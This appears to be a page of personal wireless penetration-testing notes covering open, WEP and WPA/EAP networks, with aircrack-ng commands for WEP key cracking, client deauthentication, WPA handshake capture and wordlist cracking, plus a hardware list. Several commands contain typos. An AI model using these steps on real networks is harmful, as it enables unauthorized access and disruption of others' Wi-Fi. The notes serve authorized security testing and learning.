Buy me a tea

Wireless pentest

Open network

  • Usually for guest access and only for internet

  • The guest can access it directly or they need to authenticate through a portal

WEP

  • This protocol has been completely broken for many years and should not be used anymore.

  • We can find the key very easily

# Capture around 30 000 IV (maybe more)
airodump-ng -c 11 --bssid 60:A4:4C:20:DF:60 -w [OUTPUTFILENAME] wlan0mon
# Generate ARP traffic
aireplay-ng -3 -b 00::09:58:6F:64:1E -h 44:60:57:c8:58:A0 wlan0mon
# Monitor the number of IV with
Aircrack out.cap
# Break the key
Aircrack out.cap

WPA

  • 2 authentication modes :

    • Personal = WPA PSK (Pre-Shared Key) = authentification by a secret shared with everyone (like at home)

    • Enterprise = WPA MGT (Management) = EAP (Extensible Authentication Protocol). It is possible to use several different EAP methods (see the official list on the IANA website) but here are the most common versions:

      • PEAP : historically the only protocol supported by Windows, transmits the credentials of the AD via an MSCHAPv2, thus allowing to recover a NetNTLMv2 hash through the Evil-Twin attack.

      • EAP-TTLS : very similar, can authenticate via login/password which can be recovered via the Evil-Twin attack if the clients do not check the certifcat of the access point.

      • EAP-TLS : mutual authentication by certificate.

The Hacking process

image

Source: Practical Ethical Hacking - TCM Security

# check if the wireless card is detected
iwconfig
# shut card if necessary
ifconfig wlan0 down
# kill all interference
airmon-ng check kill
# put the card in monitor mode
iwconfig wlan0 mode monitor
# relaunch it
ifconfig wlan0 up

OR

# check if the wireless card is detected
iwconfig
# kill all interference
airmon-ng check kill
# put card in monitor mode
airmon-ng start wlan0
# check if it worked
iwconfig
# Find the ssid in our scope for the test
airodump-ng wlan0mon
# monitor our target for handshakes. For -c we need to specify the channel number found with the previous command and for the bssid option we need the mac address we also found with the previous command
airodump-ng -c <channel-number> --bbsid <MAC-ADDRESS> -w outfile 
# sending deauth
airplay-ng -0 1 -a <MAC-ADDRESS> -c <MAC-ADDRESS-STATION> wlanmon0
# check our capture .ap file to crack the handshake
ls capture*
# crack the handshake with a wordlist
aircrack-ng -w wordlist -b <MAC-ADDRESS> capture-NN.cap

Tools

Equipment

  • The following are equipment that can be used for wifi pentest

    • Wireless card Alfa AWUD036NH

    • Alfa AWUS1900

    • Alfa AWUS036ACH

    • Alfa AWUS052NH

    • Alfa AWUS051NH

    • Alfa AWUS036NHR

    • TP-Link TL-WN722N

    • Hak5 Pineapple Nano Basic

    • Flipper Zero along with the wifi dev board

Resources

LogoWireless Penetration Testing Checklist - A Detailed Cheat SheetGBHackers On Security
Wireless pentest checklist
LogoPwning WPA/WPA2 Networks With Bettercap and the PMKID Client-Less Attackevilsocket
PWNING WPA/WPA2 NETWORKS WITH BETTERCAP AND THE PMKID CLIENT-LESS ATTACK - on evilsocket
Logocracking_wpa [Aircrack-ng]
How to Crack WPA/WPA2
LogoWirelesSHack – Source of news for electronic projects including Linux, Wireless Security, KODI, SDR, Raspberry Pi, How-To- information, Reviews, Guides and Tutorials.
WirelesSHack
LogoPractical Ethical Hacking - The Complete Course
Practical Ethical Hacking - TCM Security
PreviousIOSNextCloud Pentest

Last updated